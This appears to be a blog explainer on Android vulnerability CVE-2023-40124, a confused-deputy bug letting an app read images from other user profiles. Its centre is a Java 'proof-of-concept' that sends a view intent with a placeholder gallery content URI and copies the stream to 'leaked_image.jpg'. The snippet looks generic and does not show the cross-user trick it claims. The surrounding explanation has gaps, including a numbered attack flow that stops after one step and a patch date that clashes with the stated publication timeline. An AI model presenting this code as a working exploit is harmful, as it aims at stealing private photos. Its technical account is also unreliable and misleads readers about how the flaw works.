If you care about the security of your private images and use an Android device, you should know about CVE-2023-40124. This vulnerability makes it possible for a malicious app to read photos or images belonging to other profiles on the same device, all without your permission or any special privilege. And yes—this means your family, your kids, or even your business profile may be leaking images to a rogue app, silently in the background.
In this article, let’s break down what this bug is, how it works, and see a simple code snippet demonstrating the exploit. We’ll also link to official sources for further reading.
What is CVE-2023-40124?
CVE-2023-40124 is a vulnerability found in the Android operating system. It’s all about a confused deputy problem, where a trusted component in the system accidentally helps a less privileged app by giving it access to sensitive data, like your photos, that it shouldn’t have.
Information exposed can include private photos or images from other user accounts on the same device
Original advisory:
Android Security Bulletin - September 2023 (CVE-2023-40124)
How Does It Happen? (The Confused Deputy Explained)
Android devices often allow multiple user accounts (for example, a personal and a work profile, or accounts for kids). Normally, apps can’t access data from profiles other than their own.
However, certain system services, like image viewers or sharing activities, act as a “confused deputy.” They can sometimes be tricked into accessing the data of another user and handing it down to an unprivileged app.
Imagine this flow
1. Malicious app on profile A requests a photo from the system, but asks in such a way that the system fetches the photo from profile B
Exploiting CVE-2023-40124 (Sample Code)
Let’s see a minimal proof-of-concept. You should NOT use this for malicious purposes—this is for educational, defensive understanding only!
Suppose a vulnerable Android device has two users: “User A” and “User B”. User A is the attacker.
An app running under User A crafts an intent like this
// Build an Intent to access image content
Intent intent = new Intent(Intent.ACTION_VIEW);
// Try to use a content URI from User B
Uri imageUri = Uri.parse("content://com.android.gallery3d.provider/your_private_image_path");
// Set flags to grant read permission
intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
// Start the activity—which the system might handle as user B
context.startActivity(intent);
// Now, try to access the resulting content
InputStream inputStream = context.getContentResolver().openInputStream(imageUri);
if (inputStream != null) {
// Copy the leaked image data somewhere
File leakedFile = new File(context.getFilesDir(), "leaked_image.jpg");
Files.copy(inputStream, leakedFile.toPath());
inputStream.close();
}
By abusing some system components that don’t validate which user’s content is being fetched, this attack could pull images from other profiles.
Confidentiality breach: Photos from other users may be exposed to apps you didn’t expect
- No permissions needed: Even without reading storage permission, some system mishandling can still lead to the leak
Silent: No indication to the user
This could be used by a parental control bypass, a privacy-violating adware, or any other malicious software lurking in Google Play (or sideloaded apps).
Mitigation & Patch
Google fixed this in the September 2023 update:
Android Security Bulletin (CVE-2023-40124)
References
- CVE-2023-40124 at NVD
- Google Android Source Security Bulletin, September 2023
- OWASP Confused Deputy
Conclusion
CVE-2023-40124 is an example of how modern devices and their multi-user features can sometimes backfire if access control checks are missed. It’s a textbook “confused deputy” bug—a system component trusted by everyone is manipulated by an intruder.
Check your device for updates and always stay patched. Your private pictures and files depend on it.
Have questions about this vulnerability? I’m happy to answer them in the comments.
Timeline
Published on: 02/15/2024 23:15:08 UTC
Last modified on: 11/04/2024 17:35:03 UTC